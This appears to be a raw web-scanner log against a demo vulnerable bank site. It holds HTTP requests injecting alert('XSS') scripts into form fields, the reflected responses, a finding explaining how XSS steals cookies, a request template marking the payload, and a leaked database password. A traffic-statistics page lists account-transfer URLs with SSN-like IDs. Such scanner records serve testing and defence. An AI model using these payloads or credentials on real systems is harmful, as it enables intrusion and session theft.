User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=>"><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 402
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = >"><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = >"><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=<attack>>"><script>alert('XSS')</script></attack><script>alert\('XSS'\)<\/script>GET /stats/stats.html HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:37 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Thu, 17 Jan 2002 04:54:47 GMT
ETag: "2ed27316139fc11:8f6"
Content-Length: 271575
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<FONT FACE="Arial" COLOR="#000000">
<!-- WT_VERSION_2.0 -->
<!-- WT_WINDOW_NAME>Building Summary Report...</WT_WINDOW_NAME -->
<!-- WT_AUTO_EXIT -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_REPORT_TITLE>Webserver Statistics</WT_REPORT_TITLE -->
<!-- WT_CRLF -->
<!-- WT_LOG_TITLE>www.freebank.com</WT_LOG_TITLE -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_CENTER><CENTER>Prepared By:</CENTER></WT_CENTER -->
<!-- WT_CRLF -->
<!-- WT_AUTHOR>C:\Program Files\WebTrends Log Analyzer\wtm_log\wtm_log.ini</WT_AUTHOR -->
<!-- WT_CRLF -->
<!-- WT_COMPANY>C:\Program Files\WebTrends Log Analyzer\wtm_log\wtm_log.ini</WT_COMPANY -->
<!-- WT_CRLF -->
<!-- WT_CENTER><CENTER>on <!-- WT_DATE_TIME --></CENTER></WT_CENTER -->
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
<!-- TABLE OF CONTENTS -->
<!-- WT_TOC>Table of Contents</WT_TOC -->
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- WT_TABLE_OF_CONTENTS -->
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
<!-- Start Strip -->
<CENTER><a href="http://www.freebank.com">
<img border=0 src="/images/freebank-logo2.gif" alt="Freebank">
</a></CENTER>
<H1><CENTER><EM><WTHDR>Webserver Statistics</WTHDR></EM></CENTER></H1>
<H2><CENTER>www.freebank.com</CENTER></H2>
<!-- End Strip -->
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<P><HR><P>
<a name="GeneralStats"><!--General Statistics::General Statistics--></A>
<!-- WT_H1>General Statistics</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF">
<B>General Statistics</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->The User Profile by Regions graph identifies the general location of the visitors to your Web site. The General Statistics table includes statistics on the total activity for this web site during the designated time frame. <!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index00.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<!-- ---- ---- -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>2, 3.2, 2.8</WT_TABLE_STATS -->
<!-- WT_NO_COLUMN_TITLES -->
<CENTER><B>General Statistics</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>General Statistics</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Date & Time This Report was Generated</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Saturday January 12, 2002 - 21:49:35</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Timeframe</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">09/30/01 19:06:56 - 01/13/02 19:39:41</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of Hits for Home Page</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">0</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of Successful Hits for Entire Site</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">63026</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of Page Views (Impressions)</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">16990</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of User Sessions</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">10898</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Sessions from United States</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">68.38%</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>International User Sessions</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.01%</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Sessions of Unknown Origin</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">27.59%</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average Number of Hits Per Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">600</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average Number of Page Views Per Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">161</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average Number of User Sessions Per Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">103</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average User Session Length</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:08:05</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
<!-- ---- ---- -->
><HR><P>
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopDocuments"><!--Resources Accessed::Most Requested Pages--></A>
<!-- WT_H1>Most Requested Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Requested Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the most popular web site pages and how often they were accessed. The average time a user spends viewing a page is also indicated in the table.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index01.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=6 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>6, .3, 2.7, .7
, .7
, .8
, .8</WT_TABLE_STATS -->
<CENTER><B>Most Requested Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Requested Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Views</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total Views</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Avg. Time</CENTER></B></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4736</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">27.87%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4305</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:41 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1033</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.08%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">847</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:04:28 </TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">804</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.73%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">723</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:53 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_controversies.htm">http://www.freebank.com/nbf_controversies.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">732</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">662</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:00:48 </TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">629</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.7%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">598</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:03:34 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_essay_gl_01.htm">http://www.freebank.com/nbf_essay_gl_01.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">627</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">596</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:06:05 </TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_bye.htm">http://www.freebank.com/nbf_bye.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">620</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.64%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">597</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:02:30 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_more.htm">http://www.freebank.com/nbf_more.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">566</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.33%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">506</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:01 </TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_memorial.htm">http://www.freebank.com/nbf_memorial.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">560</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.29%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">517</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:04 </TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_speeches.htm">http://www.freebank.com/nbf_speeches.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">375</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.2%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">328</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:00:35 </TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sub Total For the Page Views Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10682</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62.87%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>N/A</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>N/A</B></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>16990</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>N/A</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>N/A</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopBottom"><!--Resources Accessed::Least Requested Pages--></A>
<!-- WT_H1>Least Requested Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Least Requested Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the least popular pages on your Web site, and how often they were accessed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 3.3, .8
, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Least Requested Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Least Requested Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Views</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total Views</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=576-14-1122">http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=576-14-1122</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.01%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=592-11-8393">http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=592-11-8393</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.01%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/stats/stats.html">http://www.freebank.com/stats/stats.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/stats/login.asp">http://www.freebank.com/stats/login.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_heading.htm">http://www.freebank.com/nbf_heading.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/robots.txt">http://www.freebank.com/robots.txt</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/_private/">http://www.freebank.com/_private/</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/_fpclass/">http://www.freebank.com/_fpclass/</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/cos/">http://www.freebank.com/cos/</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD></TR>
